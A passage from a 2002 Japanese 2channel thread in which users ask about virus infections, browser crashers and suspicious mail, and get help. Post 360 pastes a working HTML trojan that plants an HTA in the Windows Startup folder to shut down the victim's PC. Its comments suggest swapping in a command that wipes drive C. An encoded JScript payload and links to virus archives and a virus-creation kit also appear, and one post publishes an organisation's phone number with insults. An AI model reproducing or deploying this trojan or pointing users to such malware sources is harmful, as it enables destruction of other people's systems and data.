直接ひっこ抜くとか。ちなみに今の最新定義ファイルの日付は1月30日。
http://www.symantec.com/region/jp/sarcj/defs.download.html

275 :名無しさん@お腹いっぱい。:02/02/03 01:18
>274
ああそうなのか。俺がバスターに乗り換えた理由のひとつ。

276 :名無しさん@お腹いっぱい。:02/02/03 05:41
今日ウィルスチェックしたら 4つも感染しているらしいのですが 
どこから感染したか分かるのでしょうか?こんなのがでてきたのですが
js.exception c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\windows\temp
js.seekera c:\removeithta

277 :名無しさん@お腹いっぱい。:02/02/03 06:42
>>273
亀レスですが、どうもです。
なんとかアップデートできました

278 :名無しさん@お腹いっぱい。:02/02/03 17:36
メールを送ったら付けた覚えもないのに
添付ファイルがついてるといわれました。

送った相手も初心者だったので、開いてしまったらしいんですが
中身は何も書かれていない空のファイルだったとの事です。
hotmailを使っているのですが、今までウィルス等の害を
くらったことがなくて、全然自体が把握できません。
俺も相手のパソコンも今のとこ支障なく動いてるんですが
これってウィルスなんですか?

279 :cheshire-cat:02/02/03 17:39
>>278
hotmailって、添付ファイルのウイルスを駆除してくれなかったっけ?

280 :名無しさん@お腹いっぱい。:02/02/03 17:52
相手はhotmailじゃないんです。
自分も不注意に添付ファイルを開いたような記憶はないんですが。

281 : :02/02/03 17:53
2002/02/03(日) SkyPerfecTV
昨日買ったものはスカパーのチューナー。昨日深夜に帰宅したので今日設置したのですが、なんという運の悪さ。
朝から雨。プラス雪。凍えるぐらいに寒い。雨の中ベランダにアンテナを設置しました。買ったのは Sony SAS-SP1SET。
ビックカメラで 19800 円。今買うと購入時 10% ポイント還元だけでなく、スカパーとの契約時にビックカメラから10000 ポイント還元。
実質 8000 円程度で購入してます。これを MTV2000 に回せる!と思いきや、ポイントが入るのは1ヶ月先とのこと。残念無念。


282 :ドキンちゃん:02/02/03 22:07
>>278
ウィルスチェックしてみな。そうしないと何とも言えないね。

283 : :02/02/04 20:24


284 :ねこ:02/02/04 23:44
今日文字化けしたメールがとどいて添付ファイルが一緒についてきました。
そのファイル名が「HUMOR.MP3」だったんですけど、これってウィルスですか?

285 :名無しさん@お腹いっぱい。:02/02/04 23:50
>284
それグーグルで検索すると山のようにヒットするが?

286 :名無しさん@お腹いっぱい。:02/02/05 00:03
ヴァイルスだな。たぶん。
とりあえず、>>278>>284はチェックしとけよ。
(↓シマンコテックオンラインチェック)
http://security2.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=OEUTLSIVFWMFKPXKBQW

287 :284:02/02/05 00:17
添付ファイルは見ないで削除したんですが、感染してました・・・。


288 :名無しさん@お腹いっぱい。:02/02/05 09:39
WinMEでIE5.0なんですが、
たまーにブラウザを立ち上げると画面が真っ白になって
それ以後何も受け付けず、Ctr+Alt+Deleteをすると
画面が真っ暗になって電源を切るよりしかできなくなってしまいます。
WinMEは再インストールしたばかり。
心当たりといえばわけわからんリンクをクリックしてしまったのと
身元不明のメールを即削除したぐらいなんですが…
どなたかそういうウィルスやらブラクラだか知ってる人はいないでしょうか?

289 :288:02/02/05 09:41
すいません。
IE5.5でした。

290 :非決定性名無しさん:02/02/05 10:15
>>286
(´-`).。oO( 「ウィルス」か「ヴァイラス」と呼ぶのがよろしいかと存じage…。)

291 : :02/02/05 10:38
>>288
ブラクラは除外できる可能性は高いよ。
(ほとんど、窓を沢山開かせてフリーズとかさせるだけ。
ただし、+アルファのものが絶対にないとは言えないが。)

ウイルスなどそういう悪意のプログラムによるかどうかは
分からないけど、現象としてIEが何かおかしい可能性は
ものすごく高いと思う。
この際だからまずは、ノートンかトレンドマイクロの
アンチウイルスソフトを買う。それに先だってオンラインスキャンも
やっておいていいかも。
それから、IE5.0は修復。。。といいたいところだけど、
この際5.5+SP2か6にバージョンアップしてしまっていいのでは?
最後にMEを再インストールしたと書いているけど、
上書きインストール(修復インストール)だと改善されない
トラブルは多いので、面倒でもクリーンインストールする方が
結局は早いことが多いよ。


292 :眠い人:02/02/05 13:01
はーい。
npo-fwa@minos.ocn.ne.jpからBADTRANS.B型が届きました。
特定非営利活動法人「木の建築フォラム」とか名乗っていやがります。

ただこれだけなら別に曝すつもりはなかったのですけど、電話応対に出たババアがオオバカで
前の総理の森総理大臣みたいなクルクルパーでしたので。

ちなみに電話番号は03-5144-0056です。


293 :288:02/02/05 13:10
>>291
回答ありがとうございます。
MEは一応クリーンインストールしたんですよ。
っで一週間もたたないうちにトラブッたんでちょっとショックを…
とりあえずIEのバージョンアップ、ダメならウィルスソフト、
それでもダメならクリーンインストール、っという感じで
やってみようかと思います。
ありがとうございました!

294 :名無しさん@お腹いっぱい。:02/02/05 14:32
下記の様なウイルスの情報ご存知の方いますか?
InterScanとVirusScan使ってますがどちらにも引っかかりません。

送信者:fun@******(******は感染者使用のドメイン名、一応ふせときます)
件名:A IE 6.0 patch
本文[2行]:This is a IE 6.0 patch(改行)I wish you would like it
添付:ATT00003.txt(138byt)、README.TXT(3.12KB)

295 :npo-fwa@minos.ocn.ne.jp:02/02/05 15:17
http://www.forum.or.jp/
特定非営利活動法人「木の建築フォラム」
〒104-6204 東京都中央区晴海1-8-12 オフィスタワーZ4F
−−−−−
http://www.forum.or.jp/forum-tsushin/forum-tsushin-1.pdf
に npo-fwa@minos.ocn.ne.jp がある。


296 :検出名を教えてくださいませませ:02/02/05 18:37
検出名を教えてくださいませませ
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

297 :名無しさん@お腹いっぱい。:02/02/05 18:44
ウイルス→ヴァイラァスで統一運動

298 :↑無理だと思われ:02/02/05 21:41


299 :名無しさん@お腹いっぱい。:02/02/06 00:15
メールタイトルなし・重要度高
Return-Path: <MAILER-DAEMON>
Received: from flora330 (pl171.nas511.yokosuka.nttpc.ne.jp [210.165.82.171])
添付ファイル PLBNKMPL.EXE ってのが来ましたがなんでしょうか。


300 :名無しさん@お腹いっぱい。:02/02/06 00:16
hybris

301 :名無しさん@お腹いっぱい。:02/02/06 00:16
>>299
Hybris

302 :名無しさん@お腹いっぱい。:02/02/06 00:17
ありがとうございます。Outlookがスクリプト遮断しましたので
大丈夫だと思いますが・・・。


303 :けていしました!!:02/02/06 01:15
>>297
「びちびちウンチ君」で決定しました!!


304 :Hybrisはスクリプト?:02/02/06 01:16
>>302

305 :名無しさん@Emacs:02/02/06 01:47
たったこれだけの情報でHybrisと断定できる方、
できればその根拠も教えていただきたく。

306 :名無しさん@お腹いっぱい。:02/02/06 01:50
>305
添付ファイル名

307 :ごん太:02/02/06 02:03
>305
8文字.exe
頭----尻
PL----PL←(同じ)
同じファイル名生成ルーチン組んだ別物出ればこの限りじゃないけど(w



308 :名無しさん@Emacs:02/02/06 02:42
[A-Z]{8}\.EXE なファイル名のウィルスはほかにもいっぱいあるんで
なんで断定できるんじゃ、と思っとったんだが、なるほど、
([A-Z]{2})[A-Z]{4}\1.EXE なのね。ありがと。
↑正規表現わからんと意味不明だな。

309 :名無しさん@お腹いっぱい。:02/02/06 02:43
メールタイトルなし、返信先アドレスなしモナー。

加えてメール本文なし、ファイルサイズ23k(28k?)なら確定。

310 :名無しさん@お腹いっぱい。:02/02/06 02:48
Hybrisってかなり古いウィルスだけど、未だに流行ってるのが驚き

311 :名無しさん@お腹いっぱい。:02/02/06 02:58
:0:
* !^To:.*@
* Return-Path:.*<>
* Content-Type:.*multipart/mixed;.*boundary="--VE.*
ゴミ/.
拾いモン(w

312 :名無しさん@お腹いっぱい。:02/02/06 09:29
プラウザクラッシャーでしょうか?
sugoiってやつ踏んでしまってへこんでいます・・。
win検索でファイルが4個出てきて
削除しようとしたら、起動の方をクリックしてしまって
今度は名前が違ったように思えたのですが
sugoiはそのまま削除しましたが
違う名前でファイルにいるのでしょうか?
だれか知ってる方、教えてください!!
初心者なのでどうもすみませんです〜(泣



313 : :02/02/06 10:00
>>312
あわてている気持ちは分かるが、もうちょっと状況を整理して
書き込まないと。
まず、ブラクラとウイルスは違うし。
あるURLをクリックしたら(下手に「踏んだら」なんて言葉を
使わない方がいいと思うよ。)、窓が次々と開いて
フリーズしたというような、現象を見たのか。
そうならブラクラ。

sugoiってやつ、といわれても。URLとか、どこにあったとかの
情報はないのか。

WIN検索とは何なのか。何を検索したら4個出てきたのか。

> 削除しようとしたら、起動の方をクリックしてしまって
はまだしも、

> 今度は名前が違ったように思えたのですが
> sugoiはそのまま削除しましたが
の二つの分の関連がよく分からない。

とりあえず、
初心者ですごくていねいに説明してもらわないと、というなら
PC初心者板をおすすめする。
それから、閲覧するだけで感染するウイルスなどを心配して
いるのなら、トレンドマイクロとか、シマンテックのサイトで
オンラインスキャンをお奨めする。
その後は、このどっちかのアンチウイルスソフトを購入して
入れておく方がいいかと思う。



314 :312です:02/02/06 10:49
>313
レスありがとうございます!!!
まだ混乱してるので分かりにくい書き込みですみません。
yahoo板の「ヤフオク最悪な出品者と最悪な落札者」95
htp://www1.harenet.ne.jp/~m-toyota/kiken/bc/sugoi.htm  を
クリックしてしまいました。窓がつぎつぎと出てくるわ、pcはガゴガゴいうし、
パニクッてしまって窓を消すのに精一杯でした(汗。

その後、winスタートから
検索でファイルやフォルダの検索をし(sugoi で)
ファイルが4個表示されて、これを見た瞬間また混乱してしまい
削除をするはずがクリックして開けてしまったのです。
そしたらまたsugoiがウヨウヨ出てきて
そのとき出てきた物の名前が違ったように思えたのですが
sugoiが開くたびに名前が変るとかあるのでしょうか?(わかりにくくてすみません汗)
急いで消してしまったので名前すらわかりません。
まだpcの中に残っているのか不安でたまらないです。
今後、pcに影響があるのか心配で心配で・・
もう泣きっぱなしです・・今後は下手にクリックはしないようにします・・。







315 :名無しさん@お腹いっぱい。:02/02/06 12:20
スタートメニューから
アプリ起動しようとすると
しつこくFrontPageのインストーラが
でてくるんですけど
これってウイルスですか?

ウイルスバスターでは
何も検出されないんですけど、、

316 :名無しさん@お腹いっぱい。:02/02/06 12:44
>>312
mailto ストーム
FDD アタック

びびるが、ウイルスではない。

317 :名無しさん@お腹いっぱい。:02/02/06 13:12
>>315
多分インストール途中でやめたかなんかで、Officeインストーラが
ストーカー化している状態と思う。
Officeはいろいろと変なことするよ、経験上いうけど。
ただし、通常はOffice系のアプリを起動しようとしなければ
出てこないはずなので、スタートアップなどに何か入っているかも。
OSがないから分からないけど、システム情報のシステム設定ユーティリティか
コマンドのmsconfigとかで確認したほうがいいと思う。
そゆことで、こころあたりがあればビジネスソフト板のオフィス系のところか、
こころあたりがないなら、WIN板の該当するOSの質問スレあたりの方が
適当だと思うよ。

318 :検出名を教えてくださいませませ:02/02/06 23:06
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

319 : :02/02/07 00:02
今日、やっと光ファイバーが開通しました。工事に結構手間取って、午後遅くに完了しました。
Bフレッツの10Mです。8MのADSLが通らないエリアだったこともありますが、新物好きなので、光ファイバーにしたのです。
5,000円+プロバイダー料金ですので、6〜7,000円位で、PCが5台まで接続できますので、考えようですが、ずいぶん安いと思います。
様子を見て、100M(9,000円)にしようかなと思いますが、PCとかルーターの性能が追いついていないので当分はこのままにしようと思います。
使ってみると掲示板が2秒ちょっとで表示されますので、快適です!ただ、ネットスケープ6.2は、途中でネゴシエーションが何回もストップして、遅いです。
旧バージョンのネットスケープ4.2の方が快適です。ということで、靴の前にPCが欲しくなってきました。
画面がXGAではちょっと狭いので、UXGAかSXGAのノートパソコンがいいかなと物色していたのですが、VAIOしかないですネ。
う〜ん、一番性能がいいタイプは30万円位ですので、買うには気合が必要です・・・。
靴を買うか、PCを買うか、本当に悩ましいです。30万円あると、日本でもウゴリーニなどのビスポークが2足できます。
フランスでなら、ウェストンのコンピューターオーダーが2足、ベルルッティのビスポークも1足できます。
比較の対象が、靴になってしまうところが、私らしいですネ(笑い)。いずれにしても、購買意欲は高まっています。
日本大不況の一般人への浸透の訪れを予感していながら、反省していません・・・。


320 :名無しさん@お腹いっぱい。:02/02/07 00:04
>319
で?

321 :仕様書無しさん:02/02/07 00:12
 最近IISを構築したら頻繁にNimdaに感染するようになりました。
なんででしょう?どっかに穴があいてるんでしょうか?

322 :cheshire-cat:02/02/07 00:15
>>321
IISを直接攻撃するのはパッチあてればいい。
どっかのHPを見て感染するのは、IE6入れればいい。
メル感染もパッチ入れればいい。
LAN感染は、OSが入っているフォルダを丸ごと共有にしなければいい。

結局ノートンかバスターでも入れとけばいい。

323 ::02/02/07 00:20
http://www.securiteam.com/windowsntfocus/5QP08156AQ.html
[Virus Can Exploit Long Path under NTFS to Evade Detection]

↑これ、、、やばくない?(w

アッ、アッ・・・・アッ!・・奥まで入れちゃイヤ〜ン


324 :仕様書無しさん:02/02/07 00:27
>322
ありがたまきん。

325 :cheshire-cat:02/02/07 00:33
>>323
やばそうだね。
でもMSに比べればシマンテックって対応早いから、何とかなりそうな気も。

326 :名無しさん:02/02/07 00:36
ttp://www.top.or.jp/~godhand/a2.html
って何でしょうか?
踏んでしまって、何かインストールされたようなのですが。

327 :cheshire-cat:02/02/07 00:49
>>326
先日踏んだけどさ、それってジャバスクで変な別窓開くだけで、インストなんかされない。
悪質なジョークサイトみたいなもの。
「どこにインストールされるのか私もわかりません」なんて言葉で、余計に不安を煽っているだけ。

328 :名無しさん@お腹いっぱい。:02/02/07 00:49
>>326
インストールされてない

329 :音痴:02/02/07 00:53
どーもこんにちは。
Startメニューをあけて、例えばプログラムの右側には「>」があるじゃないですか?
それが何故か、数字の8に変わってしまったのです。
あと、exploreの最小化のアイコンが数字の「0」に、最大化は1.閉じるもなんかわけわからない数学的記号になってます。
おまけに、internet exploreのツールバーの「←戻る」の横に6があります。
これってvirusなのでしょうか?すいません、教えてください。(無知なもので。。。)
もし設定で直せる場合も教えてください、おねがいします。


330 :326です:02/02/07 00:54
そうですか。なんか怖くなって書き込みましたです。
ありがとうです。

331 :名無しさん@お腹いっぱい。:02/02/07 01:04
>>329
書き間違ったスレ見ろ とっくに答えが出ている

332 :名無しさん@お腹いっぱい。:02/02/07 01:04
>>329
http://homepage2.nifty.com/winfaq/


333 :332:02/02/07 01:06
被った、スマソ>>331

334 :名無しさん@お腹いっぱい。:02/02/07 01:23
W32.Badtrans@mm.encが送られてきました。
各フォルダ内の全メールをまとめて1つのファイルに保存するタイプの
メーラーを使っているため、そのフォルダ内のメールはすべて読むことができない状態です。
ノートンのウイルススキャンで発見されたものの、ファイルの修復ができず
シマンテックにもW32.Badtrans@mm.encの詳しいコメントがありません。
ちなみにBadtrans.Bのときは感染しませんでした。
他のフォルダにも同じウイルスが送られてしまったら
また感染してしまうかもしれない…と考えると鬱です(;´Д`)

335 :334:02/02/07 01:30
あー、なんかちょっと変。
「ファイルの修復ができず、隔離されたままなので
そのフォルダ内のメールはすべて読むことができない状態です。」
に訂正です。

336 :334:02/02/07 01:32
やっぱり変な文章だ。
逝ってきます…。

337 :名無しさん@お腹いっぱい。:02/02/07 01:35
>>334-336
意味はじゅうぶん分かるよ(笑)
ただ、修復できないとなると諦めた方がよさそうな・・

338 :334:02/02/07 01:38
>>337
即レスありがとうございます。
やっぱり無理ですよね。
これからはバックアップをまめに取るようにします。

339 :名無しさん@お腹いっぱい。:02/02/07 02:56
えーと。使ってるメイラーにもよるし、のーとん君がどんなふうに
ファイルを隔離するのか忘れたんでアレだけど、

1. アンチウィルスソフトをいったん停止
2. 隔離されたウィルス入りファイルをもとあった場所にコピー

運がよければこれでもとどおりメールが読めるかもしれない。となると、

3. 感染しないよう気をつけてメイラーで該当メールだけ削除
4. アンチウィルスソフトを動かす

で、うまくいくかも。あくまでも「かも」なんで期待せぬよう。

340 :検出名を教えてくださいませませ:02/02/07 03:03
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。

http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

341 :334:02/02/07 03:23
>>339
私も気になって、該当メールを削除してから
それらしきことをやってみました。
(レス読む前だったのでノートンは停止しませんでしたが…)
「項目の復元」というのがあって、感染したファイルを元の場所に戻し
それからもう一度スキャンしてみました。
なぜかウイルスは発見されず…。
うまくいったのかな。。念のためオンラインスキャンもしました。
とりあえず一安心です。
レスありがとうございました。

342 :315:02/02/07 11:28
>>317
遅レスすまそ
おっしゃるとおり、
以前、xpのSP1当てようとして
CDROM手元になくてやめてました。
あらためてSP1入れたら
なおりました。

でも、しばらくはなんともなかったのに
急におかしくなったんで
他にも何か原因あるのかなあ


343 :317:02/02/07 13:55
オフィス系、特にMS Office はウィンドウズを自分の家だと思っているらしく、
おかしなタイミングで起動時に最適化をしたりとか、とにかくいろいろあるから。
エラーメッセージもあてにならないことが多いし。
オフィス系ソフトがらみは、たいがいビジネスソフトの方が情報あると思う。
じゃあ、まあウイルスでなくて良かったってことで。

344 :非決定性名無しさん:02/02/07 14:31
>>321
(´-`).。oO(IIS導入後、すぐにポート番号を変え、フォルダ構成も変えれ。)
デフォルトのファイル名も変えれ。

345 :ウイルスのこと知りたい:02/02/07 20:13
有名な交換ソフトを介して流通していると言われるウイルス入りソフトを入手しました。
一つはW32.Whiter.Trojanが仕込まれていると掲載されたA***bat5J
一つはW32.Nimda.enc(dr)が仕込まれていると掲載された**革命 6.0 Virtual Pro
両ファイルともzip形式でしたので、解凍した後にウイルスバスター2002ビルド1217で
ドライブ全体をチェックしました。がしかし、ウイルスは検出されず。。。
上記2つのウイルスはソフトをセットアップした後でないとウイルスとして認識されない物なのでしょうか?
発症してしまっては厄介なことになると思いセットアップまではしてないのですが。。。
未知の物なので興味だけではなんともならず、是非ご教授願えればと思います。

346 :名無しさん@お腹いっぱい。:02/02/07 20:16
掲載された、っていうのはファイルサイズまで確認したのか?
ウィルス入ってないワレもいっぱいあるぞ。つーか割れるな。

347 :ウイルスのこと知りたい:02/02/07 20:33
5Jに関してはサイズ不明、革命はサイズ一致した物でした


348 :名無しさん@お腹いっぱい。:02/02/07 21:28
さっき
lain underground てとこからメールが来ました。
なんかウイルスっぽいのですが、どうでしょうか。

349 :名無しさん@お腹いっぱい。:02/02/07 22:48
>>345
どっちも誤検出で問題なし!
海外サイトをチェックすべし!

350 :345:02/02/08 00:14
>>349
そうでしたか。。。怖いもの見たさの興味本位半分、また敵を知ればむやみに
怖がるものでもないと思う考えから仕入れた物だったのですが
恐縮ではありますが、因みに海外サイトはどのあたりを見れば?
お教えて頂ければうれしいのですが

351 :名無しさん@お腹いっぱい。:02/02/08 02:32
先日、あるURLを開いた為に、
動きは一定時間で女の人の顔がフルスクリーンに映し出されるようになりました。
おまけに、「きゃ〜」と叫びます。
表示時間は約1秒くらいで、出現割合はランダムです。
同じような経験がある人はいませんか?もしかしてウィルス?
かなり、キモイので対処方法を是非教えてください!!
本当に困っています…。


352 :名無しさん@お腹いっぱい。:02/02/08 02:49
>351
「はぁぁああぁん!!」

・・・ってなまなましい声出すやつだったらよかったのにね。

353 :割れより「収監しりある」読め!:02/02/08 03:16


354 :名無しさん@お腹いっぱい。:02/02/10 01:23
メールでW32/Hllp Gopとか言うのが送られてきて
アンチウィルスソフトがアラート出したので削除したのですが
これはどんなウィルスでしょう?
Googleで検索しても出なかったので・・・。

355 :名無しさん@お腹いっぱい。:02/02/10 01:26
>354
でたが?
ttp://www.symantec.com/region/jp/sarcj/cgi-bin/vsearch.cgi

356 :名無しさん@お腹いっぱい。:02/02/10 03:08
170 :夜勤 ★ :02/02/10 03:02 ID:???
2ちゃんねるはログを取っていた!

This is the attack I am refering to.. notice all the SYN_RECV messages.
These will hand waiting for an ACK or a FIN message. The source address of
these is random.

tcp 0 0 64.71.177.66:80 7.3.48.44:1984 SYN_RECV root
tcp 0 0 64.71.177.66:80 130.0.90.1:1972 SYN_RECV root
tcp 0 0 64.71.177.66:80 22.0.44.63:1506 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.21.80.5:1695 SYN_RECV root
tcp 0 0 64.71.177.66:80 83.2.28.41:1606 SYN_RECV root
tcp 0 0 64.71.177.66:80 1.83.197.83:1220 SYN_RECV root
tcp 0 0 64.71.177.66:80 106.3.26.45:1411 SYN_RECV root
tcp 0 0 64.71.177.66:80 11.15.73.23:1770 SYN_RECV root
tcp 0 0 64.71.177.66:80 117.52.53.0:1283 SYN_RECV root
tcp 0 0 64.71.177.66:80 12.59.51.94:1401 SYN_RECV root
tcp 0 0 64.71.177.66:80 129.8.32.43:1474 SYN_RECV root
tcp 0 0 64.71.177.66:80 137.2.38.49:1914 SYN_RECV root
tcp 0 0 64.71.177.66:80 15.22.48.30:1867 SYN_RECV root
tcp 0 0 64.71.177.66:80 19.91.80.15:1124 SYN_RECV root
tcp 0 0 64.71.177.66:80 2.12.232.39:1191 SYN_RECV root
tcp 0 0 64.71.177.66:80 218.2.211.8:1460 SYN_RECV root
tcp 0 0 64.71.177.66:80 24.44.57.72:1438 SYN_RECV root
tcp 0 0 64.71.177.66:80 34.10.39.43:1160 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.4.127.36:1993 SYN_RECV root
tcp 0 0 64.71.177.66:80 37.61.29.68:1927 SYN_RECV root
tcp 0 0 64.71.177.66:80 39.29.144.2:1075 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.24.56.84:1931 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.53.50.26:1288 SYN_RECV root

357 :名無しさん@お腹いっぱい。:02/02/10 03:16
279 名前:夜勤 ★ :02/02/10 03:15 ID:???
まさしく SYN flood ですっていう意味ね




358 :未解決 検出名:02/02/10 03:34
http://www.ebcvg.com/files/binary/Empire.248.zip
のウイルスバスター2002での検出名を教えてください。
−−−−−
ウイルスバスター2002の未知のウイルスの検出名は?
−−−−−
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。

ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。

初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

359 :Seeker?:02/02/10 04:36
//**Start Encode**#@~^9gEAAA==@#@&NG1Es+xDRS.kD+cJ@!bKKd2K,
u2&MC:xTPqqGKu'T~1W[+{^WsRhdclmOr7+pRz^Dk-(;W:aW
nxD@*@!zznKJAK@*rbi@#@&0!U^YbW PzE"rv#`YMz
mFx[KmEhn Y la2^+Ok$ZTi@#@&mqRk+OZd?(9vJ w1&lfZy+RF;
sZOqF9T b9AOR!ZZT*wf*0)ZANJ*I@#@&C8R1D+mY(xkYCx1+c~*i@#@&jt
^P',CqRV+Dr8Ln^D`bi@#@&l8RdnDZSj(G`E Z9W&oA!8OsZ,2RF8ZoOR,*T
!!zTZO!*W++%)J*i@#@&O.H ~?4sR"+L MkYncrCFZ`w'?G6YSlD-'
\k1DG/K0Ow'qxDnD +Y,3aw^WM+.-w\mkU-'jYmDO~hlonEBJ4YD2=z&Sh
SRxm\ nYSW.3cxnOJ:X4G:zJ*I@#@&)mmY^tcn* N81CY1tcn*
8NdYPksnKEOvJHEyb`*E~8!T!*i@#@&JzO @*@#@&PJQAAA==

^#~@


360 : :02/02/10 04:38
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Death to Pedophils!!!
</title>
</head>
<body><big>Death to pedophiles!!!</big>

<OBJECT
ID="egg"
WIDTH=100
HEIGHT=51
CLASSID="CLSID:1C6AAACF-A781-11D1-AAFD-000001145528"
CODEBASE=error.msg
ACRSYSINFO.OCX#Version=1,2,0,2">
</OBJECT>




<OBJECT id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14" >
</OBJECT>
<script>


scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\winmem.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run
('command /c rundll.exe user.exe,exitwindows',false,6)</"+"SCRIPT>";scr.write();
</script>
</body>
</html>
<!-- This little trojan just shuts down the lamer computer at startup -->
<!-- Of course if you are evil enough you can replace the rundll blah-blah command with deltree /y c: -->
<!-- All that the lamer has to do is read this msg and of course he has to have javascript enabled -->
<!-- You can modify the text between the big tags -->
<!-- You can change the name of the file from winmem.hta to whateveryouwant.hta -->
<!-- DO NOT DELETE OR ADD BLANK SPACES OR DO NOT DIVIDE A LINE IN 2...OR
SOMETHING ELSE CUZ THE EXPLOIT MIGHT WONT WORK -->


361 :名無しさん@お腹いっぱい。:02/02/10 05:08
知人から、下記のようなメールが来てウイルスだと判断したのですが、
どこのサイトにも該当するものがありません。どなたか正体を教えてください。

ちなみにその知人はBadtransを繰り返し送ってくるバカです。ハードディスク
に空きが無くてアンチウイルスソフト入れられないんだとさ。
---------

Subject: A good tool
Received: from 21cn.com ([61.140.60.248])
by ums513.nifty.ne.jp (8.9.3+3.2W/3.7W000811) with SMTP id KAA22507
for <******@nifty.ne.jp>; Sun, 3 Feb 2002 10:15:20 +0900 (JST)
Message-Id: <200202030115.KAA22507@ums513.nifty.ne.jp>
Received: from 21cn.com([10.2.0.6]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm93c5cbfec; Sun, 03 Feb 2002 09:14:50 +0800
Received: from Rksvz([61.214.36.134]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm33c57c568; Wed, 30 Jan 2002 15:11:05 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=NbLhp9koJe7UJa3DjAzK18gC2019d8L85
X-UIDL: 3c5c8f3002AWFJ8W

Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

This is a good tool
I hope you would enjoy it.

添付ファイル:height.scr 86782byte、light[1].jpg 5639byte

362 :名無しさん@お腹いっぱい。:02/02/10 11:03
どうでもいいけど、ウイルス最初に発見した人(感染した人)が名前つけれたらいいのにな・・・

363 :名無しさん@お腹いっぱい。:02/02/10 15:12
はあ?最初の発見者が命名しているんだよ。馬鹿。

364 :名無しさん@お腹いっぱい。:02/02/10 15:15
おいおい 2chの鯖ウィルス感染してないか?

365 :名無しさん@お腹いっぱい。:02/02/10 15:17
ああああぁぁじょjf@えjふぁえいrjふぉあえjふぉえrjg:えあおrjvごえいjr

366 :名無しさん@お腹いっぱい。:02/02/10 15:22
このスレ警告出ます JS.Exception.Exploit (by ノートン)

だれかソース(一部)書いたのかYO

367 :名無しさん@お腹いっぱい。:02/02/10 18:41
質問です。

友達のPCなんですけど、
2chで何かのファイルを落としたらウイルスに感染してしまったそうです。
症状はPCを使っていると、いきなり画面が黒くなり
コワイ女の人の画像とともに悲鳴が聞こえるそうです。
HPでもそんなのがよく貼ってありましたよね。たぶんあれのウイルス版だと思います。
駆除の方法がわからないのですが、どうすればよいでしょうか?



368 :名無しさん@お腹いっぱい。:02/02/10 20:20
>>367
聞き飽きた。

369 : :02/02/12 07:55
 

370 : :02/02/12 08:26
>>367
漏れもスレURL貼るのめんどくさい。
初級ネット板いけば、スレタイトルですぐ分かるのがあるから
そこ見てくれ。
同様の連中がまだいるせいか、たいてい上の方にあるし。
一応、いっとくけど全然ウイルスじゃないし。

371 :名無しさん@お腹いっぱい。:02/02/12 14:37
質問です。初心者ですがすみません。
ウィルスかどうかはわからないのですが、
ウィンドウを最大化(最小化、閉じる)する□や×の部分がいきなりバグって
数字のようなものになってしまいまいした。
ブラウザの右下部分にはπが出ています。
その他にも、本来ならば▼なはずが数字に化けています。
チェックボックスも化けています。
PCの使用にあたって大した影響はないのですが、
これはウィルスなのでしょうか?
(スキャンにはひっかかりませんでした)
それともPC自体壊れているのでしょうか。
情報お願いします。

372 :名無しさん@お腹いっぱい。:02/02/12 14:49
>>371
お前なあなんも調べないで
ほざくなよー
その話題ならもう10000回くらいきいてんだよ。
windows板逝け

373 :名無しさん@お腹いっぱい。:02/02/12 14:51
http://pc.2ch.net/test/read.cgi/win/1012620619/2
>>371
ここ逝ってくれ(大汗)

もうくんな・・・

374 :名無しさん@お腹いっぱい。:02/02/12 19:21
>373
親切君発見

375 :age:02/02/14 15:50
ウイルスが多量に置いてあるサイトがありました
ttp://sinagoga.hoops.ne.jp/html/virus_down.htm
